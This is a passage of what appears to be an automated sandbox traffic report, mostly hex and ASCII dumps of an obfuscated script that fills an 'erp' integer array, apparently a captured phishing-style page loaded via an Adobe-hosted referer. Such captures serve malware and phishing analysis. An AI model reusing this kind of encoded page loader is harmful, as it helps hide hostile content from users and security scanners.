                                                                                                                                                                                                                                                                                                              Data Ascii: 710304;erp[94] = 538976374;erp[95] = 1634869363;erp[96] = 1668442480;erp[97] = 1950706789;erp[98] = 1835363956;erp[99] = 1751474532;erp[100] = 1953460256;erp[101] = 1025533039;erp[102] = 1668640101;erp[103] = 1853107811;erp[104] = 1919246708;e
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC544INData Raw: 65 72 70 5b 31 35 34 5d 20 3d 20 35 33 38 39 37 36 33 31 36 3b 0a 65 72 70 5b 31 35 35 5d 20 3d 20 31 38 33 35 33 36 35 34 37 33 3b 0a 65 72 70 5b 31 35 36 5d 20 3d 20 35 34 33 37 31 36 34 36 38 3b 0a 65 72 70 5b 31 35 37 5d 20 3d 20 31 38 38 32 30 32 33 32 38 31 3b 0a 65 72 70 5b 31 35 38 5d 20 3d 20 31 39 36 39 38 34 35 38 32 31 3b 0a 65 72 70 5b 31 35 39 5d 20 3d 20 35 37 34 38 34 31 31 38 37 3b 0a 65 72 70 5b 31 36 30 5d 20 3d 20 31 37 35 31 34 36 31 31 38 37 3b 0a 65 72 70 5b 31 36 31 5d 20 3d 20 31 38 36 39 35 30 39 37 34 36 3b 0a 65 72 70 5b 31 36 32 5d 20 3d 20 31 38 36 39 33 35 37 36 30 30 3b 0a 65 72 70 5b 31 36 33 5d 20 3d 20 31 36 36 38 32 34 37 31 35 36 3b 0a 65 72 70 5b 31 36 34 5d 20 3d 20 31 37 30 31 37 33 37 35 33 33 3b 0a 65 72 70 5b 31
                                                                                                                                                                                                                                                                                                              Data Ascii: erp[154] = 538976316;erp[155] = 1835365473;erp[156] = 543716468;erp[157] = 1882023281;erp[158] = 1969845821;erp[159] = 574841187;erp[160] = 1751461187;erp[161] = 1869509746;erp[162] = 1869357600;erp[163] = 1668247156;erp[164] = 1701737533;erp[1
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC546INData Raw: 31 34 5d 20 3d 20 31 39 35 33 30 36 33 35 33 32 3b 0a 65 72 70 5b 32 31 35 5d 20 3d 20 31 36 39 36 37 33 35 33 33 31 3b 0a 65 72 70 5b 32 31 36 5d 20 3d 20 31 38 36 39 35 30 39 37 33 33 3b 0a 65 72 70 5b 32 31 37 5d 20 3d 20 31 38 35 33 31 31 31 35 38 36 3b 0a 65 72 70 5b 32 31 38 5d 20 3d 20 31 32 32 39 32 37 34 34 36 39 3b 0a 65 72 70 5b 32 31 39 5d 20 3d 20 31 36 38 34 34 39 37 36 39 38 3b 0a 65 72 70 5b 32 32 30 5d 20 3d 20 31 30 34 31 30 34 31 39 35 32 3b 0a 65 72 70 5b 32 32 31 5d 20 3d 20 35 33 38 39 37 36 33 31 36 3b 0a 65 72 70 5b 32 32 32 5d 20 3d 20 31 38 33 35 33 36 35 34 37 33 3b 0a 65 72 70 5b 32 32 33 5d 20 3d 20 35 34 34 31 30 34 38 31 33 3b 0a 65 72 70 5b 32 32 34 5d 20 3d 20 31 36 39 38 35 30 35 33 33 34 3b 0a 65 72 70 5b 32 32 35 5d 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 14] = 1953063532;erp[215] = 1696735331;erp[216] = 1869509733;erp[217] = 1853111586;erp[218] = 1229274469;erp[219] = 1684497698;erp[220] = 1041041952;erp[221] = 538976316;erp[222] = 1835365473;erp[223] = 544104813;erp[224] = 1698505334;erp[225]
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC547INData Raw: 3d 20 39 39 30 37 31 30 33 30 34 3b 0a 65 72 70 5b 32 37 35 5d 20 3d 20 35 33 38 39 37 36 33 35 34 3b 0a 65 72 70 5b 32 37 36 5d 20 3d 20 31 38 37 30 31 34 36 39 33 31 3b 0a 65 72 70 5b 32 37 37 5d 20 3d 20 31 37 36 39 36 33 30 30 36 32 3b 0a 65 72 70 5b 32 37 38 5d 20 3d 20 31 37 33 31 38 36 32 36 32 36 3b 0a 65 72 70 5b 32 37 39 5d 20 3d 20 31 38 36 39 37 36 37 37 38 31 3b 0a 65 72 70 5b 32 38 30 5d 20 3d 20 31 39 31 35 35 37 36 39 34 33 3b 0a 65 72 70 5b 32 38 31 5d 20 3d 20 32 30 31 37 31 33 35 38 38 32 3b 0a 65 72 70 5b 32 38 32 5d 20 3d 20 35 33 38 39 37 36 32 38 38 3b 0a 65 72 70 5b 32 38 33 5d 20 3d 20 31 37 31 38 35 37 38 38 30 34 3b 0a 65 72 70 5b 32 38 34 5d 20 3d 20 37 36 31 36 38 34 33 33 33 3b 0a 65 72 70 5b 32 38 35 5d 20 3d 20 31 37 36 38
                                                                                                                                                                                                                                                                                                              Data Ascii: = 990710304;erp[275] = 538976354;erp[276] = 1870146931;erp[277] = 1769630062;erp[278] = 1731862626;erp[279] = 1869767781;erp[280] = 1915576943;erp[281] = 2017135882;erp[282] = 538976288;erp[283] = 1718578804;erp[284] = 761684333;erp[285] = 1768
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC548INData Raw: 34 30 34 34 35 35 34 35 3b 0a 65 72 70 5b 33 33 35 5d 20 3d 20 31 36 36 38 34 34 34 30 31 39 3b 0a 65 72 70 5b 33 33 36 5d 20 3d 20 31 38 36 38 39 38 35 33 37 36 3b 0a 65 72 70 5b 33 33 37 5d 20 3d 20 31 34 39 39 35 34 37 37 34 39 3b 0a 65 72 70 5b 33 33 38 5d 20 3d 20 31 37 36 33 37 32 36 36 36 35 3b 0a 65 72 70 5b 33 33 39 5d 20 3d 20 35 37 33 33 31 37 37 30 39 3b 0a 65 72 70 5b 33 34 30 5d 20 3d 20 31 37 36 38 31 32 35 30 33 39 3b 0a 65 72 70 5b 33 34 31 5d 20 3d 20 31 39 33 36 36 38 30 35 36 34 3b 0a 65 72 70 5b 33 34 32 5d 20 3d 20 35 34 31 37 34 37 33 30 31 3b 0a 65 72 70 5b 33 34 33 5d 20 3d 20 31 38 35 32 32 36 32 35 30 31 3b 0a 65 72 70 5b 33 34 34 5d 20 3d 20 31 37 36 33 37 32 36 36 36 35 3b 0a 65 72 70 5b 33 34 35 5d 20 3d 20 35 37 33 33 31 37
                                                                                                                                                                                                                                                                                                              Data Ascii: 40445545;erp[335] = 1668444019;erp[336] = 1868985376;erp[337] = 1499547749;erp[338] = 1763726665;erp[339] = 573317709;erp[340] = 1768125039;erp[341] = 1936680564;erp[342] = 541747301;erp[343] = 1852262501;erp[344] = 1763726665;erp[345] = 573317
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC550INData Raw: 33 35 30 31 38 37 38 36 3b 0a 65 72 70 5b 33 39 35 5d 20 3d 20 39 39 30 37 31 30 33 39 37 3b 0a 65 72 70 5b 33 39 36 5d 20 3d 20 32 31 38 37 36 32 35 30 36 3b 0a 65 72 70 5b 33 39 37 5d 20 3d 20 37 37 39 33 38 30 30 38 38 3b 0a 65 72 70 5b 33 39 38 5d 20 3d 20 31 39 34 39 31 33 35 37 33 33 3b 0a 65 72 70 5b 33 39 39 5d 20 3d 20 31 36 35 31 37 39 36 33 34 30 3b 0a 65 72 70 5b 34 30 30 5d 20 3d 20 31 38 31 38 35 36 39 37 36 30 3b 0a 65 72 70 5b 34 30 31 5d 20 3d 20 31 37 34 38 32 34 36 36 35 31 3b 0a 65 72 70 5b 34 30 32 5d 20 3d 20 32 31 38 37 36 37 33 39 32 3b 0a 65 72 70 5b 34 30 33 5d 20 3d 20 35 33 38 39 39 34 32 38 37 3b 0a 65 72 70 5b 34 30 34 5d 20 3d 20 31 38 35 33 31 30 37 35 37 35 3b 0a 65 72 70 5b 34 30 35 5d 20 3d 20 31 37 30 31 34 30 36 35 36
                                                                                                                                                                                                                                                                                                              Data Ascii: 35018786;erp[395] = 990710397;erp[396] = 218762506;erp[397] = 779380088;erp[398] = 1949135733;erp[399] = 1651796340;erp[400] = 1818569760;erp[401] = 1748246651;erp[402] = 218767392;erp[403] = 538994287;erp[404] = 1853107575;erp[405] = 170140656
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC551INData Raw: 20 3d 20 38 30 38 34 38 32 34 30 38 3b 0a 65 72 70 5b 34 35 36 5d 20 3d 20 39 39 30 37 31 30 33 30 34 3b 0a 65 72 70 5b 34 35 37 5d 20 3d 20 35 33 38 39 37 36 33 37 35 3b 0a 65 72 70 5b 34 35 38 5d 20 3d 20 31 37 36 38 31 39 31 30 38 30 3b 0a 65 72 70 5b 34 35 39 5d 20 3d 20 39 37 35 31 38 38 32 37 32 3b 0a 65 72 70 5b 34 36 30 5d 20 3d 20 38 31 33 30 37 30 31 33 39 3b 0a 65 72 70 5b 34 36 31 5d 20 3d 20 32 31 38 37 36 37 33 39 32 3b 0a 65 72 70 5b 34 36 32 5d 20 3d 20 35 33 38 39 39 33 37 36 39 3b 0a 65 72 70 5b 34 36 33 5d 20 3d 20 31 39 33 36 37 34 37 36 31 37 3b 0a 65 72 70 5b 34 36 34 5d 20 3d 20 32 30 33 33 38 35 32 35 33 32 3b 0a 65 72 70 5b 34 36 35 5d 20 3d 20 31 36 33 33 38 34 30 32 32 39 3b 0a 65 72 70 5b 34 36 36 5d 20 3d 20 37 36 31 34 38 38
                                                                                                                                                                                                                                                                                                              Data Ascii: = 808482408;erp[456] = 990710304;erp[457] = 538976375;erp[458] = 1768191080;erp[459] = 975188272;erp[460] = 813070139;erp[461] = 218767392;erp[462] = 538993769;erp[463] = 1936747617;erp[464] = 2033852532;erp[465] = 1633840229;erp[466] = 761488
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC552INData Raw: 20 3d 20 32 30 30 30 32 39 38 31 30 32 3b 0a 65 72 70 5b 35 31 37 5d 20 3d 20 31 37 36 39 31 37 31 32 39 38 3b 0a 65 72 70 5b 35 31 38 5d 20 3d 20 31 38 31 38 35 37 33 35 38 31 3b 0a 65 72 70 5b 35 31 39 5d 20 3d 20 31 36 39 38 37 37 35 33 36 3b 0a 65 72 70 5b 35 32 30 5d 20 3d 20 35 34 34 38 37 37 39 32 39 3b 0a 65 72 70 5b 35 32 31 5d 20 3d 20 31 38 35 32 30 37 33 33 33 36 3b 0a 65 72 70 5b 35 32 32 5d 20 3d 20 39 37 35 31 39 30 33 32 39 3b 0a 65 72 70 5b 35 32 33 5d 20 3d 20 39 39 30 37 31 30 33 30 34 3b 0a 65 72 70 5b 35 32 34 5d 20 3d 20 35 33 38 39 37 36 33 35 35 3b 0a 65 72 70 5b 35 32 35 5d 20 3d 20 31 38 31 38 35 38 33 34 31 30 3b 0a 65 72 70 5b 35 32 36 5d 20 3d 20 39 37 35 32 30 30 38 37 39 3b 0a 65 72 70 5b 35 32 37 5d 20 3d 20 31 39 35 32 39
                                                                                                                                                                                                                                                                                                              Data Ascii: = 2000298102;erp[517] = 1769171298;erp[518] = 1818573581;erp[519] = 169877536;erp[520] = 544877929;erp[521] = 1852073336;erp[522] = 975190329;erp[523] = 990710304;erp[524] = 538976355;erp[525] = 1818583410;erp[526] = 975200879;erp[527] = 19529
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC554INData Raw: 5b 35 37 37 5d 20 3d 20 35 34 30 31 36 32 31 36 30 3b 0a 65 72 70 5b 35 37 38 5d 20 3d 20 32 30 31 37 31 33 35 38 38 32 3b 0a 65 72 70 5b 35 37 39 5d 20 3d 20 35 33 38 39 39 36 30 36 35 3b 0a 65 72 70 5b 35 38 30 5d 20 3d 20 31 39 31 39 33 37 39 38 32 32 3b 0a 65 72 70 5b 35 38 31 5d 20 3d 20 37 36 32 30 37 38 35 36 36 3b 0a 65 72 70 5b 35 38 32 5d 20 3d 20 31 39 34 39 39 36 36 33 39 32 3b 0a 65 72 70 5b 35 38 33 5d 20 3d 20 31 38 38 36 39 32 37 36 32 39 3b 0a 65 72 70 5b 35 38 34 5d 20 3d 20 31 36 39 38 37 37 36 31 33 3b 0a 65 72 70 5b 35 38 35 5d 20 3d 20 31 36 33 34 38 38 37 35 32 39 3b 0a 65 72 70 5b 35 38 36 5d 20 3d 20 31 38 34 38 34 37 32 31 36 39 3b 0a 65 72 70 5b 35 38 37 5d 20 3d 20 31 37 33 34 38 39 38 37 34 36 3b 0a 65 72 70 5b 35 38 38 5d 20
                                                                                                                                                                                                                                                                                                              Data Ascii: [577] = 540162160;erp[578] = 2017135882;erp[579] = 538996065;erp[580] = 1919379822;erp[581] = 762078566;erp[582] = 1949966392;erp[583] = 1886927629;erp[584] = 169877613;erp[585] = 1634887529;erp[586] = 1848472169;erp[587] = 1734898746;erp[588]
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC555INData Raw: 35 33 37 38 37 37 35 37 3b 0a 65 72 70 5b 36 33 38 5d 20 3d 20 39 37 36 31 30 36 38 36 36 3b 0a 65 72 70 5b 36 33 39 5d 20 3d 20 31 37 30 31 36 35 37 34 34 36 3b 0a 65 72 70 5b 36 34 30 5d 20 3d 20 31 38 36 39 35 30 39 36 37 37 3b 0a 65 72 70 5b 36 34 31 5d 20 3d 20 32 30 30 33 31 33 34 38 32 33 3b 0a 65 72 70 5b 36 34 32 5d 20 3d 20 31 37 35 32 34 34 37 35 34 31 3b 0a 65 72 70 5b 36 34 33 5d 20 3d 20 38 30 38 34 36 37 33 30 38 3b 0a 65 72 70 5b 36 34 34 5d 20 3d 20 31 37 36 38 38 34 32 35 34 31 3b 0a 65 72 70 5b 36 34 35 5d 20 3d 20 31 37 35 31 34 37 36 35 38 33 3b 0a 65 72 70 5b 36 34 36 5d 20 3d 20 31 37 35 32 34 34 37 35 33 37 3b 0a 65 72 70 5b 36 34 37 5d 20 3d 20 37 37 35 30 34 33 39 36 35 3b 0a 65 72 70 5b 36 34 38 5d 20 3d 20 32 31 38 37 36 38 32
                                                                                                                                                                                                                                                                                                              Data Ascii: 53787757;erp[638] = 976106866;erp[639] = 1701657446;erp[640] = 1869509677;erp[641] = 2003134823;erp[642] = 1752447541;erp[643] = 808467308;erp[644] = 1768842541;erp[645] = 1751476583;erp[646] = 1752447537;erp[647] = 775043965;erp[648] = 2187682
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC556INData Raw: 31 36 34 3b 0a 65 72 70 5b 36 39 38 5d 20 3d 20 31 36 36 37 37 38 35 30 36 31 3b 0a 65 72 70 5b 36 39 39 5d 20 3d 20 31 38 31 38 35 37 30 33 33 39 3b 0a 65 72 70 5b 37 30 30 5d 20 3d 20 31 38 36 39 35 30 39 37 32 39 3b 0a 65 72 70 5b 37 30 31 5d 20 3d 20 31 37 36 38 38 34 32 36 31 30 3b 0a 65 72 70 5b 37 30 32 5d 20 3d 20 32 30 37 31 34 32 33 33 33 32 3b 0a 65 72 70 5b 37 30 33 5d 20 3d 20 31 39 35 32 39 38 37 36 38 30 3b 0a 65 72 70 5b 37 30 34 5d 20 3d 20 38 32 35 32 34 31 36 33 37 3b 0a 65 72 70 5b 37 30 35 5d 20 3d 20 39 39 37 32 32 30 37 30 38 3b 0a 65 72 70 5b 37 30 36 5d 20 3d 20 31 36 38 34 36 33 31 31 34 33 3b 0a 65 72 70 5b 37 30 37 5d 20 3d 20 37 36 32 34 37 32 38 30 37 3b 0a 65 72 70 5b 37 30 38 5d 20 3d 20 31 37 35 32 34 34 37 35 32 30 3b 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 164;erp[698] = 1667785061;erp[699] = 1818570339;erp[700] = 1869509729;erp[701] = 1768842610;erp[702] = 2071423332;erp[703] = 1952987680;erp[704] = 825241637;erp[705] = 997220708;erp[706] = 1684631143;erp[707] = 762472807;erp[708] = 1752447520;
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC558INData Raw: 37 35 38 5d 20 3d 20 31 38 38 32 39 34 32 38 31 37 3b 0a 65 72 70 5b 37 35 39 5d 20 3d 20 31 39 31 39 33 37 39 38 32 32 3b 0a 65 72 70 5b 37 36 30 5d 20 3d 20 37 36 32 36 30 35 34 32 34 3b 0a 65 72 70 5b 37 36 31 5d 20 3d 20 39 37 39 35 39 31 35 33 32 3b 0a 65 72 70 5b 37 36 32 5d 20 3d 20 31 36 36 33 35 39 36 31 32 39 3b 0a 65 72 70 5b 37 36 33 5d 20 3d 20 31 39 31 35 32 33 35 36 32 39 3b 0a 65 72 70 5b 37 36 34 5d 20 3d 20 31 36 35 31 37 31 35 34 33 31 3b 0a 65 72 70 5b 37 36 35 5d 20 3d 20 31 39 37 30 35 36 36 32 34 35 3b 0a 65 72 70 5b 37 36 36 5d 20 3d 20 31 39 31 35 35 38 32 37 36 31 3b 0a 65 72 70 5b 37 36 37 5d 20 3d 20 35 33 39 36 33 31 36 36 31 3b 0a 65 72 70 5b 37 36 38 5d 20 3d 20 38 32 34 37 38 35 37 37 33 3b 0a 65 72 70 5b 37 36 39 5d 20 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: 758] = 1882942817;erp[759] = 1919379822;erp[760] = 762605424;erp[761] = 979591532;erp[762] = 1663596129;erp[763] = 1915235629;erp[764] = 1651715431;erp[765] = 1970566245;erp[766] = 1915582761;erp[767] = 539631661;erp[768] = 824785773;erp[769] =
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC559INData Raw: 37 35 32 30 35 33 3b 0a 65 72 70 5b 38 31 39 5d 20 3d 20 36 39 31 37 36 31 32 34 39 3b 0a 65 72 70 5b 38 32 30 5d 20 3d 20 31 36 38 34 33 30 32 31 39 30 3b 0a 65 72 70 5b 38 32 31 5d 20 3d 20 31 37 33 31 30 33 30 31 31 37 3b 0a 65 72 70 5b 38 32 32 5d 20 3d 20 31 37 31 38 38 39 33 31 35 35 3b 0a 65 72 70 5b 38 32 33 5d 20 3d 20 31 36 33 34 34 39 33 32 32 34 3b 0a 65 72 70 5b 38 32 34 5d 20 3d 20 31 39 38 36 30 39 37 37 30 34 3b 0a 65 72 70 5b 38 32 35 5d 20 3d 20 37 35 37 39 34 39 30 34 33 3b 0a 65 72 70 5b 38 32 36 5d 20 3d 20 37 36 31 37 35 34 39 39 36 3b 0a 65 72 70 5b 38 32 37 5d 20 3d 20 31 39 35 32 38 30 35 34 32 31 3b 0a 65 72 70 5b 38 32 38 5d 20 3d 20 32 30 31 35 39 36 31 31 33 30 3b 0a 65 72 70 5b 38 32 39 5d 20 3d 20 35 33 39 38 39 39 31 37 37
                                                                                                                                                                                                                                                                                                              Data Ascii: 752053;erp[819] = 691761249;erp[820] = 1684302190;erp[821] = 1731030117;erp[822] = 1718893155;erp[823] = 1634493224;erp[824] = 1986097704;erp[825] = 757949043;erp[826] = 761754996;erp[827] = 1952805421;erp[828] = 2015961130;erp[829] = 539899177
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC560INData Raw: 70 5b 38 37 39 5d 20 3d 20 31 37 35 39 36 37 34 39 38 3b 0a 65 72 70 5b 38 38 30 5d 20 3d 20 35 39 33 37 31 38 33 38 33 3b 0a 65 72 70 5b 38 38 31 5d 20 3d 20 31 39 36 39 35 31 34 30 39 32 3b 0a 65 72 70 5b 38 38 32 5d 20 3d 20 31 36 33 34 38 38 37 30 31 31 3b 0a 65 72 70 5b 38 38 33 5d 20 3d 20 31 36 33 34 37 35 39 37 37 39 3b 0a 65 72 70 5b 38 38 34 5d 20 3d 20 31 37 35 31 32 31 33 34 32 30 3b 0a 65 72 70 5b 38 38 35 5d 20 3d 20 31 36 39 36 36 30 37 38 34 34 3b 0a 65 72 70 5b 38 38 36 5d 20 3d 20 31 37 36 39 31 37 33 31 30 30 3b 0a 65 72 70 5b 38 38 37 5d 20 3d 20 31 36 33 35 33 33 31 33 38 30 3b 0a 65 72 70 5b 38 38 38 5d 20 3d 20 35 34 34 39 35 38 30 36 33 3b 0a 65 72 70 5b 38 38 39 5d 20 3d 20 31 38 35 33 31 30 37 35 37 31 3b 0a 65 72 70 5b 38 39 30
                                                                                                                                                                                                                                                                                                              Data Ascii: p[879] = 175967498;erp[880] = 593718383;erp[881] = 1969514092;erp[882] = 1634887011;erp[883] = 1634759779;erp[884] = 1751213420;erp[885] = 1696607844;erp[886] = 1769173100;erp[887] = 1635331380;erp[888] = 544958063;erp[889] = 1853107571;erp[890
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC562INData Raw: 3d 20 31 37 35 31 32 31 33 34 32 30 3b 0a 65 72 70 5b 39 34 30 5d 20 3d 20 31 36 39 36 36 30 37 38 34 38 3b 0a 65 72 70 5b 39 34 31 5d 20 3d 20 38 37 34 35 34 33 39 37 34 3b 0a 65 72 70 5b 39 34 32 5d 20 3d 20 31 38 36 39 35 30 39 36 37 37 3b 0a 65 72 70 5b 39 34 33 5d 20 3d 20 31 39 33 36 32 39 32 34 35 33 3b 0a 65 72 70 5b 39 34 34 5d 20 3d 20 39 37 35 32 30 31 31 32 31 3b 0a 65 72 70 5b 39 34 35 5d 20 3d 20 31 38 31 38 34 33 37 36 37 38 3b 0a 65 72 70 5b 39 34 36 5d 20 3d 20 39 35 39 34 35 39 34 34 32 3b 0a 65 72 70 5b 39 34 37 5d 20 3d 20 31 37 30 31 36 35 30 34 37 35 3b 0a 65 72 70 5b 39 34 38 5d 20 3d 20 35 33 39 38 39 38 37 34 32 3b 0a 65 72 70 5b 39 34 39 5d 20 3d 20 31 39 39 39 31 39 30 39 30 39 3b 0a 65 72 70 5b 39 35 30 5d 20 3d 20 32 31 38 37
                                                                                                                                                                                                                                                                                                              Data Ascii: = 1751213420;erp[940] = 1696607848;erp[941] = 874543974;erp[942] = 1869509677;erp[943] = 1936292453;erp[944] = 975201121;erp[945] = 1818437678;erp[946] = 959459442;erp[947] = 1701650475;erp[948] = 539898742;erp[949] = 1999190909;erp[950] = 2187
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC563INData Raw: 30 39 38 30 30 36 35 36 33 3b 0a 65 72 70 5b 31 30 30 30 5d 20 3d 20 31 36 36 38 30 35 30 38 30 35 3b 0a 65 72 70 5b 31 30 30 31 5d 20 3d 20 31 36 38 34 34 33 34 30 31 37 3b 0a 65 72 70 5b 31 30 30 32 5d 20 3d 20 31 39 31 39 32 34 37 32 30 31 3b 0a 65 72 70 5b 31 30 30 33 5d 20 3d 20 31 38 38 36 36 37 35 38 31 36 3b 0a 65 72 70 5b 31 30 30 34 5d 20 3d 20 31 36 33 34 30 33 36 38 33 37 3b 0a 65 72 70 5b 31 30 30 35 5d 20 3d 20 35 33 39 31 38 39 38 37 34 3b 0a 65 72 70 5b 31 30 30 36 5d 20 3d 20 31 38 37 30 30 39 39 33 30 31 3b 0a 65 72 70 5b 31 30 30 37 5d 20 3d 20 31 39 31 39 31 31 37 34 31 33 3b 0a 65 72 70 5b 31 30 30 38 5d 20 3d 20 31 36 36 37 39 36 35 30 35 31 3b 0a 65 72 70 5b 31 30 30 39 5d 20 3d 20 31 38 33 35 31 30 32 38 32 33 3b 0a 65 72 70 5b 31
                                                                                                                                                                                                                                                                                                              Data Ascii: 098006563;erp[1000] = 1668050805;erp[1001] = 1684434017;erp[1002] = 1919247201;erp[1003] = 1886675816;erp[1004] = 1634036837;erp[1005] = 539189874;erp[1006] = 1870099301;erp[1007] = 1919117413;erp[1008] = 1667965051;erp[1009] = 1835102823;erp[1
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC564INData Raw: 5b 31 30 35 37 5d 20 3d 20 31 37 30 31 37 33 37 35 31 37 3b 0a 65 72 70 5b 31 30 35 38 5d 20 3d 20 31 36 36 37 35 39 31 37 39 36 3b 0a 65 72 70 5b 31 30 35 39 5d 20 3d 20 31 37 30 31 39 37 38 36 38 36 3b 0a 65 72 70 5b 31 30 36 30 5d 20 3d 20 32 31 38 37 37 34 36 32 38 3b 0a 65 72 70 5b 31 30 36 31 5d 20 3d 20 31 37 36 39 33 34 39 32 31 39 3b 0a 65 72 70 5b 31 30 36 32 5d 20 3d 20 31 38 31 38 33 32 35 38 37 35 3b 0a 65 72 70 5b 31 30 36 33 5d 20 3d 20 31 30 32 35 36 36 33 38 35 35 3b 0a 65 72 70 5b 31 30 36 34 5d 20 3d 20 31 38 31 34 39 31 36 31 39 39 3b 0a 65 72 70 5b 31 30 36 35 5d 20 3d 20 37 35 38 35 32 32 34 30 30 3b 0a 65 72 70 5b 31 30 36 36 5d 20 3d 20 31 39 33 37 30 31 33 31 30 30 3b 0a 65 72 70 5b 31 30 36 37 5d 20 3d 20 31 36 39 38 35 30 35 33
                                                                                                                                                                                                                                                                                                              Data Ascii: [1057] = 1701737517;erp[1058] = 1667591796;erp[1059] = 1701978686;erp[1060] = 218774628;erp[1061] = 1769349219;erp[1062] = 1818325875;erp[1063] = 1025663855;erp[1064] = 1814916199;erp[1065] = 758522400;erp[1066] = 1937013100;erp[1067] = 16985053
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC566INData Raw: 3b 0a 65 72 70 5b 31 31 31 35 5d 20 3d 20 37 35 38 33 39 30 39 30 30 3b 0a 65 72 70 5b 31 31 31 36 5d 20 3d 20 31 37 30 32 33 39 32 38 37 37 3b 0a 65 72 70 5b 31 31 31 37 5d 20 3d 20 31 36 36 37 35 39 31 37 39 36 3b 0a 65 72 70 5b 31 31 31 38 5d 20 3d 20 31 37 30 31 39 37 38 36 38 36 3b 0a 65 72 70 5b 31 31 31 39 5d 20 3d 20 32 31 38 37 37 34 36 33 30 3b 0a 65 72 70 5b 31 31 32 30 5d 20 3d 20 31 38 36 39 37 37 30 30 31 36 3b 0a 65 72 70 5b 31 31 32 31 5d 20 3d 20 31 37 36 38 31 37 36 39 33 30 3b 0a 65 72 70 5b 31 31 32 32 5d 20 3d 20 31 38 33 36 36 36 34 34 33 31 3b 0a 65 72 70 5b 31 31 32 33 5d 20 3d 20 31 39 31 39 37 35 34 37 38 34 3b 0a 65 72 70 5b 31 31 32 34 5d 20 3d 20 31 36 33 33 39 30 37 38 31 37 3b 0a 65 72 70 5b 31 31 32 35 5d 20 3d 20 31 38 36
                                                                                                                                                                                                                                                                                                              Data Ascii: ;erp[1115] = 758390900;erp[1116] = 1702392877;erp[1117] = 1667591796;erp[1118] = 1701978686;erp[1119] = 218774630;erp[1120] = 1869770016;erp[1121] = 1768176930;erp[1122] = 1836664431;erp[1123] = 1919754784;erp[1124] = 1633907817;erp[1125] = 186
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC567INData Raw: 31 36 39 36 36 32 37 30 35 35 3b 0a 65 72 70 5b 31 31 37 33 5d 20 3d 20 31 39 37 30 34 31 33 36 38 33 3b 0a 65 72 70 5b 31 31 37 34 5d 20 3d 20 31 37 30 31 30 31 36 39 34 36 3b 0a 65 72 70 5b 31 31 37 35 5d 20 3d 20 31 37 36 39 32 34 30 38 37 38 3b 0a 65 72 70 5b 31 31 37 36 5d 20 3d 20 32 31 38 37 37 34 35 37 35 3b 0a 65 72 70 5b 31 31 37 37 5d 20 3d 20 31 37 31 38 35 37 39 38 32 31 3b 0a 65 72 70 5b 31 31 37 38 5d 20 3d 20 31 30 34 31 30 34 31 39 38 30 3b 0a 65 72 70 5b 31 31 37 39 5d 20 3d 20 37 39 35 31 30 39 37 35 30 3b 0a 65 72 70 5b 31 31 38 30 5d 20 3d 20 31 30 34 31 30 34 31 39 38 30 3b 0a 65 72 70 5b 31 31 38 31 5d 20 3d 20 37 39 35 31 30 39 37 35 30 3b 0a 65 72 70 5b 31 31 38 32 5d 20 3d 20 31 30 34 31 30 34 31 39 38 30 3b 0a 65 72 70 5b 31 31
                                                                                                                                                                                                                                                                                                              Data Ascii: 1696627055;erp[1173] = 1970413683;erp[1174] = 1701016946;erp[1175] = 1769240878;erp[1176] = 218774575;erp[1177] = 1718579821;erp[1178] = 1041041980;erp[1179] = 795109750;erp[1180] = 1041041980;erp[1181] = 795109750;erp[1182] = 1041041980;erp[11


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              4192.168.2.164973199.86.229.114443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC4OUTGET /utilnav/9.1/utilitynav.css HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: prod.adobeccstatic.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              40192.168.2.1649786104.17.2.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC568OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
